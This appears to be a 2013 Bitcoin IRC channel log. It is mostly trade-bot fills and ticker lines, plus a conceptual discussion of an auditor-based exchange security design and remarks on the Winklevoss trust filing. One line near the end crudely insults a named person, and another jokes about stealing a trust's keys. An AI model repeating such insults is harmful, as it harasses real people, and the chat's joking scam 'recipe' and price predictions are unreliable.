BTC [-] Jul 02 01:23:25 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.0039 = 3.9 BTC [-] Jul 02 01:24:01 Bitfunder became the new GLBSE. Jul 02 01:24:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [+] Jul 02 01:25:02 what hapnd this time? Jul 02 01:25:11 [BTCTC] [AMC-PT] 9 @ 0.00101 = 0.0091 BTC [-] Jul 02 01:26:35 People who do weird stuff and etc Jul 02 01:27:43 how weird ? Jul 02 01:29:44 ;;ticker Jul 02 01:29:44 MtGox BTCUSD ticker | Best bid: 88.80279, Best ask: 88.83000, Bid-ask spread: 0.02721, Last trade: 88.83000, 24 hour volume: 47550.96313601, 24 hour low: 88.10000, 24 hour high: 98.18010, 24 hour vwap: 91.71002 Jul 02 01:29:58 Well no, if it happened on GLBSE... it's ought to happen again elsewhere. Jul 02 01:29:58 ;;bcstats Jul 02 01:30:02 Current Blocks: 244305 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1646 blocks | Next Difficulty In About: 1 week, 3 days, 21 hours, 36 minutes, and 57 seconds | Next Difficulty Estimate: 23464900.6671 | Estimated Percent Change: 9.98143 Jul 02 01:30:21 [BTCTC] [AMC-PT] 1750 @ 0.00101 = 1.7675 BTC [-] Jul 02 01:30:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [+] Jul 02 01:36:18 big news @gox Jul 02 01:36:35 they released their magento plugin update Jul 02 01:36:37 woohoo Jul 02 01:37:33 davout, do you mind clarifying what you mean by "auditors" in your security scheme ? Jul 02 01:37:54 [BTCTC] [AMC-PT] 10 @ 0.00101 = 0.0101 BTC [-] Jul 02 01:40:39 Stardust: a system designed to monitor a defined data-set in order to : ensure data integrity, enforce arbitrary business rules on it, ensure data stability over time, issue customizable alerts, generate customizable reporting and authenticate to operators using public key cryptography Jul 02 01:41:28 thanks Jul 02 01:41:52 basically it looks at your data to make sure nobody is fucking with it, that the incoming bitcoin transactions actually match your available addresses, and send you GPG-signed e-mails to report on all this Jul 02 01:42:19 the rationale behind the scheme being that you may be able to compromise a web server Jul 02 01:43:06 compromise the database server behind it, maaaaybe one auditor, but you sure won't be able to hack into all of it at the same time before one of the components alerts you Jul 02 01:43:56 makes sense, now there's just one thing : let's suppose the webserver is completly compromised Jul 02 01:43:58 and since you can run the auditors behind tor a distributed message queue or whatever it becomes very very hard to compromise Jul 02 01:44:11 anyone else notice how Google Chrome never loads Google.com correctly when you first install it in a fresh Windows install? Jul 02 01:44:19 Bing.com loads fine of course Jul 02 01:44:22 [MPEX] [S.MPOE] 4212 @ 0.00082774 = 3.4864 BTC [-] Jul 02 01:44:23 but you don't play with any data yet, you just look at the network traffic to identify all the auditors Jul 02 01:44:30 similar issues loading google.com from IE Jul 02 01:44:46 using the url bar as a search bar Jul 02 01:44:46 Stardust: ok, what do you do next ? Jul 02 01:45:24 couldn't you arbitrarily control the taffic being sent to all these auditors ? Jul 02 01:45:53 Stardust sure. Jul 02 01:46:05 once you've compromised a machine, any output cannot be relied on Jul 02 01:46:12 first thing, you want to run at least one auditor offline Jul 02 01:46:22 second thing you need to look at the reporting Jul 02 01:46:43 [MPEX] [S.MPOE] 3870 @ 0.00082774 = 3.2034 BTC [-] Jul 02 01:46:44 so first case (and I'll take a BTC/EUR exchange for the sake of the discussion) Jul 02 01:46:44 [MPEX] [S.MPOE] 3500 @ 0.00082754 = 2.8964 BTC [-] Jul 02 01:46:54 attacker adds himself EUR Jul 02 01:47:00 [MPEX] [S.MPOE] 2708 @ 0.00082467 = 2.2332 BTC [-] Jul 02 01:47:01 [MPEX] [S.MPOE] 2122 @ 0.00082459 = 1.7498 BTC [-] Jul 02 01:47:13 in the accounting Jul 02 01:47:16 yep Jul 02 01:47:30 [HAVELOCK] [ASICM] 10 @ 0.04547 = 0.4547 BTC [+] Jul 02 01:47:46 he gets caught immediately when you cross check your auditor's report against your bank balance Jul 02 01:47:59 obviously Jul 02 01:48:10 he adds himself BTC, same thing Jul 02 01:48:20 [HAVELOCK] [ASICM] 12 @ 0.04548696 = 0.5458 BTC [+] Jul 02 01:48:33 ok, so what can he do next ? Jul 02 01:48:43 he can fake user input Jul 02 01:48:50 the thing is the offline auditor is useless in a case of a quick attack, since you have to check manually Jul 02 01:49:08 Stardust: if you don't have a wot wallet there's nothing to gain from a quick attack Jul 02 01:49:29 i assumed there was one Jul 02 01:49:37 and even if you have a hot wallet it should sit tight behind tor getting its orders only from a consensus of auditors Jul 02 01:49:54 there should not be, precisely for the case you describe Jul 02 01:50:24 so how do you handle btc withdrawal in that case ? Jul 02 01:50:43 ok, imagine you have what we'll call a bitcoind node Jul 02 01:50:49 ok Jul 02 01:50:51 [BTCTC] [TAT.ASICMINER] 25 @ 0.04449 = 1.1123 BTC [+] Jul 02 01:50:53 [BTCTC] [TAT.ASICMINER] 11 @ 0.044689 = 0.4916 BTC [+] Jul 02 01:51:17 it would listen to messages on a distributed queue, accessing it through Tor Jul 02 01:51:26 it only pulls data, never gets pushed to Jul 02 01:51:37 right Jul 02 01:51:40 it reades messages pushed by 4 different auditors Jul 02 01:51:43 *reads Jul 02 01:51:52 for which it has the GPG keys Jul 02 01:52:00 so that's the node that will make the btc transactions Jul 02 01:52:06 the bitcoind node Jul 02 01:52:14 yep Jul 02 01:52:27 nobody knows where it is Jul 02 01:52:33 not even the auditors Jul 02 01:52:38 these messages will come from the webserver, or some kind of entitiy linked to it right ? Jul 02 01:52:47 from the auditors Jul 02 01:52:47 *the auditors Jul 02 01:53:02 ok, i'll give the way i see it fully implemented Jul 02 01:53:45 user signs a request, with some in-browser ECDSA crypto if he's lazy, or with some manual GPG crypto if he cares Jul 02 01:54:08 webservers records "user X wants to withdraw Z BTC to the AAA address, signed by the user" Jul 02 01:54:29 auditors get knowledge of the information Jul 02 01:54:45 verify the request against the user's public key Jul 02 01:54:56 allow it, push a signed message on the queue Jul 02 01:55:21 [BTCTC] [TAT.ASICMINER] 22 @ 0.044692 = 0.9832 BTC [+] Jul 02 01:55:29 bitcoind node polls the queue, ends up with 4 messages signed by different auditors saying the same thing Jul 02 01:55:42 proceeds to send Jul 02 01:55:44 [MPEX] [S.MPOE] 2585 @ 0.00082868 = 2.1421 BTC [+] Jul 02 01:56:27 the idea is the only way to win the "my server is more secure than yours game" is not to play it at all but change your strategy Jul 02 01:57:09 which is indeed the way to go Jul 02 01:57:47 i just kinda missed the "signed by user" part in my attack scheme, looks good to me now except : Jul 02 01:57:59 [BTCTC] [S.DICE-PT] 7 @ 0.002348 = 0.0164 BTC [+] Jul 02 01:58:07 if you want to have a sensible security scheme you need to do some boring manual shit too, there's no avoiding it Jul 02 01:58:07 [HAVELOCK] [ASICM] 3 @ 0.045 = 0.135 BTC [-] Jul 02 01:58:07 the auditors would have to keep the public key of all users Jul 02 01:58:28 they can simply pull it from the webserver Jul 02 01:58:34 and check that it never changes Jul 02 01:58:40 as part of the rules to enforce Jul 02 01:58:44 so why pull it ? Jul 02 01:58:56 why just don't record it at the user registration Jul 02 01:59:03 i mean to enforce the data integrity maybe Jul 02 01:59:12 because the auditors are never in contact with the user Jul 02 01:59:22 they simply look at the main app server DB Jul 02 01:59:24 as part of the rules to enforce // nevermind, misses that Jul 02 01:59:26 yeah Jul 02 02:00:03 i mean the continously pulling mecanism isn't relevant for the withdrawal process, it is as to enforcing Jul 02 02:00:19 it is Jul 02 02:00:30 withdrawal requests first hit the app server DB Jul 02 02:00:35 yeah Jul 02 02:00:48 it's only after that they get replicated/copied ti the auditor Jul 02 02:00:55 which in turns signs them off Jul 02 02:00:58 continuously pulling the public key is what i meant... Jul 02 02:01:04 haha Jul 02 02:01:06 no Jul 02 02:01:27 ok, looks good Jul 02 02:01:32 mircea_popescu: Get these guys to list on MPEX Jul 02 02:01:33 https://www.sec.gov/Archives/edgar/data/1579346/000119312513279830/d562329ds1.htm Jul 02 02:01:34 it will continuously pull it somehow, but just to check it does not change and that no one is ever fucking with it Jul 02 02:01:46 Stardust: you forgot one question though Jul 02 02:01:51 go ahead Jul 02 02:02:02 "how does a lazy user keep his private key ?" Jul 02 02:02:37 answer is "store it encrypted on the app server, ancrypt and decrypt it client side with symmetric crypto using the user's password" Jul 02 02:03:13 [BTCTC] [DMS.MINING] 51 @ 0.019501 = 0.9946 BTC [-] Jul 02 02:03:35 neat Jul 02 02:05:14 Winkelvoss Bitcoin Trust files with the SEC. Looks like a $20M share offering for Bitcoin exposure in your portfolio Jul 02 02:06:17 Bugpowder: nice! Jul 02 02:06:31 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [-] Jul 02 02:06:50 ahaha Jul 02 02:07:08 [HAVELOCK] [ASICM] 3 @ 0.04425 = 0.1328 BTC [-] Jul 02 02:07:47 wait, undated ? Jul 02 02:08:31 "As filed with the Securities and Exchange Commission on July 1, 2013" Jul 02 02:08:40 The Trust’s Sponsor is Math-Based Asset Services LLC. The Sponsor is a Delaware limited liability company formed on May 9, 2013, and is wholly-owned by Winklevoss Capital Management LLC. Jul 02 02:09:07 [HAVELOCK] [ASICM] 8 @ 0.0443 = 0.3544 BTC [+] Jul 02 02:09:08 I guess they did buy some coins... Jul 02 02:09:22 Winklevoss IP LLC is the owner of and is licensing to the Sponsor such intellectual property. Jul 02 02:09:29 I wonder if those were the huge 10k blocks going off last week Jul 02 02:09:45 Bugpowder wait a second. this is a preliminary filing Jul 02 02:09:50 I gotta go get dinner, looking forward to discussion. Jul 02 02:10:05 they'd buy the coins with what, their personal funds with a view to sell to this ? Jul 02 02:10:05 I have only read a few lines of it, just crossed my desk. Jul 02 02:10:08 that's illegal afaik Jul 02 02:10:36 they already own coins Jul 02 02:11:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.044692 = 0.2235 BTC [+] Jul 02 02:11:17 The NAV of the Trust is the aggregate value of the Trust’s assets less its liabilities (which include estimated accrued but unpaid fees and expenses). In determining the NAV of the Trust, the Trustee will value the price of the Bitcoins in the Trust Custody Account as determined by the relevant Blended Bitcoin Price. See “Overview of the Bitcoin Industry and Market” for a description of the operation of the Bitco Jul 02 02:11:17 in exchange market (“Bitcoin Exchange Market”) from which prices are used to determine the Blended Bitcoin Price. The Trustee will determine the NAV of the Trust on each day the [EXCHANGE] is open for regular trading, (“Evaluation Day”) as promptly as practicable after 4:00 p.m. Jul 02 02:11:23 lol ok, this is getting rejected. Jul 02 02:11:57 [BTCTC] [AMC-PT] 2 @ 0.00101 = 0.002 BTC [-] Jul 02 02:12:11 what's NAV ? net average value ? Jul 02 02:12:27 The Trustee will terminate and liquidate the Trust if one of the following events occurs: the SEC determines that the Trust is an investment company ; the CFTC determines that the Trust is a commodity pool under the Commodity Exchange Act of 1936 ; the Trust is determined to be a “money transmitter” under the regulations promulgated by FinCEN Jul 02 02:12:36 this is typical winklevoss filing. Jul 02 02:12:43 also known as three year old style painting. Jul 02 02:12:48 wonder what [EXCHANGE] will stand for, if it's gox... Jul 02 02:12:59 a lot of shit involved, a lot of paper ruined for no purpose Jul 02 02:14:12 is this maybe one of those things where they intend to do it whether it passes or not Jul 02 02:14:18 and they'll say oh we tried Jul 02 02:14:31 like covering their ass Jul 02 02:15:56 [BTCTC] [ASICMINER-PT] 2 @ 4.46 = 8.92 BTC [+] Jul 02 02:15:57 may be worth reading once it's complete, Jul 02 02:16:00 [BTCTC] [ASICMINER-PT] 1 @ 4.366 BTC [-] Jul 02 02:16:04 but so far it just looks like a lot of copy pasting Jul 02 02:16:07 [BTCTC] [ASICMINER-PT] 1 @ 4.365 BTC [-] Jul 02 02:16:17 and a spurious reference to Katten Muchin Rosenman Jul 02 02:17:25 ;;ticker Jul 02 02:17:25 MtGox BTCUSD ticker | Best bid: 87.04000, Best ask: 87.50000, Bid-ask spread: 0.46000, Last trade: 87.50000, 24 hour volume: 51013.62354168, 24 hour low: 87.00000, 24 hour high: 98.18010, 24 hour vwap: 91.44710 Jul 02 02:17:33 fun fact : the s-1 is an 8 page document Jul 02 02:17:35 lowest price since May 2nd Jul 02 02:17:42 which is supposed to take ~1k hours of effort to complete. Jul 02 02:18:52 ThickAsThieves: the price will hit 40 USD/BTC, and will then proceed to slowly climb back to 65 USD/BTC, until september 2014 where it will boom to new heights, you heard it first Jul 02 02:19:14 *here first ugh Jul 02 02:22:20 [BTCTC] [DMS.SELLING] 34 @ 0.02998 = 1.0193 BTC [+] Jul 02 02:22:22 [BTCTC] [DMS.SELLING] 10 @ 0.029989 = 0.2999 BTC [+] Jul 02 02:22:23 [BTCTC] [DMS.SELLING] 106 @ 0.02999 = 3.1789 BTC [+] Jul 02 02:24:41 [BTCTC] [GSDPT] 23 @ 0.002299 = 0.0529 BTC [+] Jul 02 02:25:00 [BTCTC] [ASICMINER-PT] 1 @ 4.36 BTC [-] Jul 02 02:25:29 [BTCTC] [AMC-PT] 245 @ 0.00101 = 0.2475 BTC [-] Jul 02 02:26:05 [BTCTC] [S.DICE-PT] 400 @ 0.002348 = 0.9392 BTC [+] Jul 02 02:26:50 [BTCTC] [S.DICE-PT] 400 @ 0.002348 = 0.9392 BTC [+] Jul 02 02:28:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.044996 = 0.09 BTC [+] Jul 02 02:29:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.044996 BTC [+] Jul 02 02:31:48 [BTCTC] [DMS.SELLING] 44 @ 0.02999 = 1.3196 BTC [+] Jul 02 02:33:55 [BTCTC] [S.DICE-PT] 32 @ 0.002348 = 0.0751 BTC [+] Jul 02 02:33:59 [HAVELOCK] [ASICM] 3 @ 0.04548796 = 0.1365 BTC [+] Jul 02 02:36:01 [BTCTC] [AMC-PT] 3 @ 0.00101 = 0.003 BTC [-] Jul 02 02:37:08 [MPEX] [S.MPOE] 2600 @ 0.00082684 = 2.1498 BTC [-] Jul 02 02:40:08 [HAVELOCK] [ASICM] 1 @ 0.04422 BTC [-] Jul 02 02:47:46 [BTCTC] [BASIC-MINING] 2 @ 0.172 = 0.344 BTC [-] Jul 02 02:47:56 [BTCTC] [DMS.MINING] 63 @ 0.019501 = 1.2286 BTC [-] Jul 02 02:48:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.044993 = 0.4499 BTC [-] Jul 02 02:49:14 [BTCTC] [DMS.SELLING] 47 @ 0.030001 = 1.41 BTC [+] Jul 02 02:49:16 [BTCTC] [DMS.SELLING] 99 @ 0.03 = 2.97 BTC [-] Jul 02 02:52:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.044993 = 2.2497 BTC [-] Jul 02 02:56:06 [BTCTC] [CRYPTO-TRADE] 12 @ 0.2 = 2.4 BTC [+] Jul 02 02:57:22 [MPEX] [S.MPOE] 20200 @ 0.00082757 = 16.7169 BTC [+] Jul 02 02:57:34 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jul 02 02:58:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.04494 BTC [-] Jul 02 02:58:27 http://www.sec.gov/Archives/edgar/data/1579346/000119312513279830/d562329ds1.htm Jul 02 02:59:39 Competition for MP? I have no idea what any of this means, btw. Jul 02 03:05:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.044994 = 0.27 BTC [+] Jul 02 03:07:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.044994 BTC [+] Jul 02 03:07:37 [BTCTC] [DMS.MINING] 3 @ 0.019501 = 0.0585 BTC [-] Jul 02 03:08:40 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004854 = 0.0243 BTC [+] Jul 02 03:09:41 "The Shareholders’ limited rights of legal recourse against the Trust, the Trustee and the Sponsor and the Trust’s lack of insurance protection expose the Trust and its Shareholders to the risk of loss of the Trust’s Bitcoins for which no person is liable." Jul 02 03:10:27 recipe: 1) found Winklevoss Bitcoin Trust. 2) "lose" (walk off with) the private keys. 3) profit! Jul 02 03:11:20 Hey, that's a brilliant idea! I wonder why I even try to keep my operation honest... Jul 02 03:11:29 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Jul 02 03:11:45 Oh, that's right, I still have a soul. I'm fairly certain it's been sold, but for now, it's mine. Jul 02 03:13:48 the linked document is very close to an official declaration of intent to scam. Jul 02 03:14:48 How wonderful. Don't forget to wear your brain condom when reading stupidity. You don't want to catch Brain Bitcointitis now, do you? Jul 02 03:16:31 Sole symptom is slow degeneration into insanity. Pretty much everyone on Bitcointalk gets infected within the first 5 minutes of reading. Jul 02 03:18:26 [BTCTC] [DMS.PURCHASE] 181 @ 0.049418 = 8.9447 BTC [-] Jul 02 03:18:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.044994 = 0.4949 BTC [+] Jul 02 03:18:42 [BTCTC] [ASICMINER-PT] 1 @ 4.449995 BTC [+] Jul 02 03:18:53 Holy crap, Ciphermine has almost clear all asks... Jul 02 03:19:13 That's like 500% rise in 2 weeks. Mining craziness indeed. Jul 02 03:19:17 https://www.litecoinglobal.com/security/CIPHERMINE Jul 02 03:19:19 LTC-GLOBAL: Litecoin Global Exchange - View Security Jul 02 03:20:34 [BTCTC] [TAT.ASICMINER] 26 @ 0.044994 = 1.1698 BTC [+] Jul 02 03:20:45 did CIPHERMINE provide any proof the person it pretends to be is indeed the one issuing? Jul 02 03:21:49 Because it keeps showing the blog and website of that succesful person but then all things CIPHERMINE is on a different website with no link between the two. Jul 02 03:21:59 [BTCTC] [TAT.ASICMINER] 24 @ 0.044998 = 1.08 BTC [+] Jul 02 03:22:14 [BTCTC] [ASICMINER-PT] 1 @ 4.467777 BTC [+] Jul 02 03:22:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.044998 BTC [+] Jul 02 03:22:33 It's not very hard to link to a reputable person and just state "Hey, I'm that person. Buy out my IPO." Jul 02 03:23:07 Hey, that's a brilliant idea! I wonder why I even try to keep my operation honest... <<< you didn;'t actually imagine the failtwins are up to anything actually useful. Jul 02 03:23:13 [BTCTC] [DMS.MINING] 18 @ 0.018121 = 0.3262 BTC [-] Jul 02 03:23:15 [BTCTC] [DMS.MINING] 100 @ 0.01812 = 1.812 BTC [-] Jul 02 03:23:33 [BTCTC] [DMS.MINING] 1 @ 0.01811 BTC [-] Jul 02 03:24:02 Namworld good point. Jul 02 03:24:07 [BTCTC] [TAT.ASICMINER] 5 @ 0.045 = 0.225 BTC [+] Jul 02 03:24:07 i guess people need to use gpg more Jul 02 03:24:13 To be honest, I don't understand half of what neither you nor they do, so my expectations are those of a pineapple. I expect to hang around for a while and then fall down and rot. Anything else is surprise to me. Jul 02 03:24:17 [BTCTC] [AMC-PT] 99 @ 0.00101 = 0.1 BTC [-] Jul 02 03:24:23 mircea_popescu, they are always up to something useful. Jul 02 03:24:23 [BTCTC] [TAT.ASICMINER] 172 @ 0.045 = 7.74 BTC [+] Jul 02 03:24:28 Entertaining us. Jul 02 03:24:37 ya, because bitcoin is backed by drama and lulz Jul 02 03:24:39 That's got to count for something, isn't it? Jul 02 03:24:44 ;;ticker Jul 02 03:24:44 MtGox BTCUSD ticker | Best bid: 88.30100, Best ask: 88.52000, Bid-ask spread: 0.21900, Last trade: 88.52000, 24 hour volume: 53432.08625911, 24 hour low: 86.01100, 24 hour high: 98.18010, 24 hour vwap: 91.19160 Jul 02 03:24:54 seems not. stale lulz ? Jul 02 03:25:39 We're low on drama lately without the billions of "OMG it's going to 1 trillion a coin in a year BUYBUYBUY!" crowd mostly gone. Jul 02 03:25:49 It was entertaining. Jul 02 03:26:32 The claims slowly built more insane and more frequent. Jul 02 03:27:07 I'd be happy to cheer for rising prices if you miss it, Nam. Jul 02 03:27:53 I eventually saw maximal craziness reached and sold at peak. Jul 02 03:28:41 I'm pretty sure Bitcoin is not backed by drama but madness. Jul 02 03:29:35 [BTCTC] [B.YABMC] 499 @ 0.0059 = 2.9441 BTC [-] Jul 02 03:30:36 Why can't it be both drama and madness? Jul 02 03:30:50 We need both; drama makes people mad and vice cersa. Jul 02 03:30:53 *versa Jul 02 03:31:14 No, drama is what infects people with madness. But it's madness which backs the price. Jul 02 03:34:40 So, create drama->infuse madness->make money. Well, at least it's more honest than the Winklevoss thing... Jul 02 03:36:12 [BTCTC] [AMC-PT] 15 @ 0.00101 = 0.0152 BTC [-] Jul 02 03:37:28 so i'm getting duplicate spam from stumbleupon. "New Updates to Paid Discovery: Campaign blabla" Jul 02 03:37:33 they're going under by now aren't they. Jul 02 03:39:08 SU still exists? Wow. Jul 02 03:39:09 [HAVELOCK] [ASICM] 50 @ 0.045 = 2.25 BTC [+] Jul 02 03:43:23 [BTCTC] [AMC-PT] 10 @ 0.001 = 0.01 BTC [-] Jul 02 03:43:25 [BTCTC] [AMC-PT] 3 @ 0.00099 = 0.003 BTC [-] Jul 02 03:46:22 [BTCTC] [S.MPOE-PT] 32 @ 0.000864 = 0.0276 BTC [-] Jul 02 03:46:49 [BTCTC] [S.MPOE-PT] 30 @ 0.000862 = 0.0259 BTC [-] Jul 02 03:47:10 [BTCTC] [ASICMINER-PT] 1 @ 4.455 BTC [-] Jul 02 03:47:41 [BTCTC] [ASICMINER-PT] 6 @ 4.454999 = 26.73 BTC [-] Jul 02 03:52:18 [BTCTC] [PAJKA.BOND] 9 @ 0.050001 = 0.45 BTC [-] Jul 02 03:52:44 [BTCTC] [PAJKA.BOND] 1 @ 0.058 BTC [+] Jul 02 03:55:11 [BTCTC] [PAJKA.BOND] 1 @ 0.05 BTC [-] Jul 02 03:55:12 [BTCTC] [PAJKA.BOND] 6 @ 0.045201 = 0.2712 BTC [-] Jul 02 03:57:39 [BTCTC] [PAJKA.BOND] 1 @ 0.05896 BTC [+] Jul 02 04:02:08 [HAVELOCK] [ASICM] 18 @ 0.04435 = 0.7983 BTC [-] Jul 02 04:17:39 [BTCTC] [S.DICE-PT] 100 @ 0.002015 = 0.2015 BTC [-] Jul 02 04:18:15 [BTCTC] [S.MPOE-PT] 2 @ 0.000862 = 0.0017 BTC [-] Jul 02 04:18:17 [BTCTC] [S.MPOE-PT] 135 @ 0.000862 = 0.1164 BTC [-] Jul 02 04:18:38 [BTCTC] [ASICMINER-PT] 1 @ 4.469982 BTC [+] Jul 02 04:18:40 [BTCTC] [ASICMINER-PT] 1 @ 4.48999 BTC [+] Jul 02 04:18:52 [HAVELOCK] [ASICM] 1 @ 0.04548588 BTC [+] Jul 02 04:19:49 [BTCTC] [GSDPT] 1 @ 0.00238 BTC [+] Jul 02 04:20:24 [BTCTC] [TAT.ASICMINER] 23 @ 0.044999 = 1.035 BTC [-] Jul 02 04:22:03 [BTCTC] [ASICMINER-PT] 7 @ 4.426004 = 30.982 BTC [-] Jul 02 04:22:21 [BTCTC] [ASICMINER-PT] 1 @ 4.426003 BTC [-] Jul 02 04:23:37 [BTCTC] [TAT.ASICMINER] 22 @ 0.044999 = 0.99 BTC [-] Jul 02 04:30:11 [BTCTC] [AMC-PT] 256 @ 0.00101 = 0.2586 BTC [+] Jul 02 04:35:33 [BTCTC] [DMS.MINING] 2 @ 0.01999 = 0.04 BTC [+] Jul 02 04:37:21 [BTCTC] [DMS.MINING] 198 @ 0.01999 = 3.958 BTC [+] Jul 02 04:37:23 [BTCTC] [DMS.MINING] 400 @ 0.02 = 8 BTC [+] Jul 02 04:37:58 [HAVELOCK] [ASICM] 3 @ 0.04548588 = 0.1365 BTC [+] Jul 02 04:39:13 [HAVELOCK] [ASICM] 3 @ 0.0454858 = 0.1365 BTC [-] Jul 02 04:42:50 [BTCTC] [CRYPTO-TRADE] 6 @ 0.2 = 1.2 BTC [+] Jul 02 04:43:36 [BTCTC] [BTC-BOND] 100 @ 0.009999 = 0.9999 BTC [+] Jul 02 04:44:19 [BTCTC] [ASICMINER-PT] 1 @ 4.499999 BTC [+] Jul 02 04:44:54 [BTCTC] [DMS.MINING] 30 @ 0.0208 = 0.624 BTC [+] Jul 02 04:45:03 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jul 02 04:45:32 [BTCTC] [ASICMINER-PT] 1 @ 4.499999 BTC [+] Jul 02 04:46:25 aww yeah Jul 02 04:46:31 bought a 5970 Jul 02 04:46:35 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Jul 02 04:46:59 [BTCTC] [DMS.MINING] 43 @ 0.0208 = 0.8944 BTC [+] Jul 02 04:47:17 gonna keep me warm over winter Jul 02 04:47:33 [BTCTC] [TAT.ASICMINER] 13 @ 0.044999 = 0.585 BTC [-] Jul 02 04:50:22 [BTCTC] [TAT.ASICMINER] 22 @ 0.044999 = 0.99 BTC [-] Jul 02 04:54:49 [BTCTC] [TAT.ASICMINER] 75 @ 0.044999 = 3.3749 BTC [-] Jul 02 04:56:09 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [+] Jul 02 04:57:09 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 02 05:01:31 [BTCTC] [DMS.SELLING] 21 @ 0.0295 = 0.6195 BTC [-] Jul 02 05:01:33 [BTCTC] [DMS.SELLING] 9 @ 0.0291 = 0.2619 BTC [-] Jul 02 05:04:14 [BTCTC] [TAT.ASICMINER] 45 @ 0.044999 = 2.025 BTC [-] Jul 02 05:05:11 [BTCTC] [TAT.ASICMINER] 13 @ 0.04494 = 0.5842 BTC [-] Jul 02 05:08:47 ;;ticker Jul 02 05:08:47 MtGox BTCUSD ticker | Best bid: 88.75066, Best ask: 89.43500, Bid-ask spread: 0.68434, Last trade: 88.75066, 24 hour volume: 56041.82797211, 24 hour low: 86.01100, 24 hour high: 98.18010, 24 hour vwap: 91.10468 Jul 02 05:08:55 wow the price is popping Jul 02 05:10:17 [MPEX] [S.MPOE] 7500 @ 0.0008289 = 6.2168 BTC [+] Jul 02 05:12:59 i guess people need to use gpg more Jul 02 05:12:59 // most def Jul 02 05:13:27 but then people are so lazy asses.. Jul 02 05:15:20 [HAVELOCK] [VTX] 1 @ 0.503 BTC [-] Jul 02 05:15:57 [HAVELOCK] [VTX] 2 @ 0.497001 = 0.994 BTC [-] Jul 02 05:18:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.044899 = 0.0898 BTC [-] Jul 02 05:19:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0445 BTC [-] Jul 02 05:20:29 [BTCTC] [TAT.ASICMINER] 16 @ 0.044002 = 0.704 BTC [-] Jul 02 05:20:45 gpg is the easiest thing in the world to use Jul 02 05:21:14 to not use gpg because of laziness is absolute absurdity Jul 02 05:22:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.044899 BTC [+] Jul 02 05:23:13 but then people are so lazy asses.. <- Count me in! Where do I sign up for lazy people? Never mind, can't be bothered... Jul 02 05:29:16 :D Jul 02 05:32:07 you'd think with a shit eating dickwhore like gmaxwell riding wikipedia's chief skank they would take btc donations Jul 02 05:32:49 [BTCTC] [DMS.SELLING] 20 @ 0.030499 = 0.61 BTC [+] Jul 02 05:32:50 [BTCTC] [DMS.SELLING] 101 @ 0.0305 = 3.0805 BTC [+] Jul 02 05:38:01 [HAVELOCK] [ASICM] 2 @ 0.0444 = 0.0888 BTC [-] Jul 02 05:38:02 [HAVELOCK] [ASICM] 1 @ 0.04430901 BTC [-] Jul 02 05:38:03 [HAVELOCK] [ASICM] 40 @ 0.044309 = 1.7724 BTC [-] Jul 02 05:38:04 [HAVELOCK] [ASICM] 3 @ 0.04430001 = 0.1329 BTC [-] Jul 02 05:38:05 [HAVELOCK] [ASICM] 124 @ 0.0443 = 5.4932 BTC [-] Jul 02 05:38:06 [HAVELOCK] [ASICM] 1 @ 0.0442 BTC [-] Jul 02 05:38:07 [HAVELOCK] [ASICM] 15 @ 0.0441 = 0.6615 BTC [-] Jul 02 05:38:08 [HAVELOCK] [ASICM] 10 @ 0.04409 = 0.4409 BTC [-] Jul 02 05:38:09 [HAVELOCK] [ASICM] 50 @ 0.04408008 = 2.204 BTC [-] Jul 02 05:38:11 [HAVELOCK] [ASICM] 248 @ 0.044 = 10.912 BTC [-] Jul 02 05:39:30 come again dub? Jul 02 05:42:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.044898 BTC [-] Jul 02 05:44:21 [HAVELOCK] [ASICM] 432 @ 0.044 = 19.008 BTC [-] Jul 02 05:45:45 [BTCTC] [AMC-PT] 615 @ 0.00101 = 0.6212 BTC [+] Jul 02 05:47:05 haha furuknap :) Jul 02 05:47:14 ? Jul 02 05:47:19 Ah. Jul 02 05:47:52 Sorry, I couldn't be bothered to scroll up a bit. Jul 02 05:48:45 thestringpuller: where is the confusion? Jul 02 05:53:10 [BTCTC] [TAT.ASICMINER] 16 @ 0.044101 = 0.7056 BTC [-] Jul 02 05:53:12 [BTCTC] [TAT.ASICMINER] 32 @ 0.0441 = 1.4112 BTC [-] Jul 02 05:55:16 [HAVELOCK] [ASICM] 1 @ 0.0453 BTC [+] Jul 02 05:55:17 [HAVELOCK] [ASICM] 100 @ 0.045 = 4.5 BTC [-] Jul 02 05:57:20 [HAVELOCK] [ASICM] 119 @ 0.0453 = 5.3907 BTC [+] Jul 02 05:58:46 [BTCTC] [TAT.ASICMINER] 15 @ 0.044898 = 0.6735 BTC [+] Jul 02 05:59:56 [BTCTC] [AMC-PT] 17 @ 0.00109 = 0.0185 BTC [+] Jul 02 06:01:23 [BTCTC] [AMC-PT] 11 @ 0.00109 = 0.012 BTC [+] Jul 02 06:01:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.044899 = 0.0898 BTC [+] Jul 02 06:02:41 [BTCTC] [AMC-PT] 7 @ 0.00099 = 0.0069 BTC [-] Jul 02 06:05:58 [BTCTC] [TAT.ASICMINER] 62 @ 0.044899 = 2.7837 BTC [+] Jul 02 06:06:19 [BTCTC] [TAT.ASICMINER] 6 @ 0.04499 = 0.2699 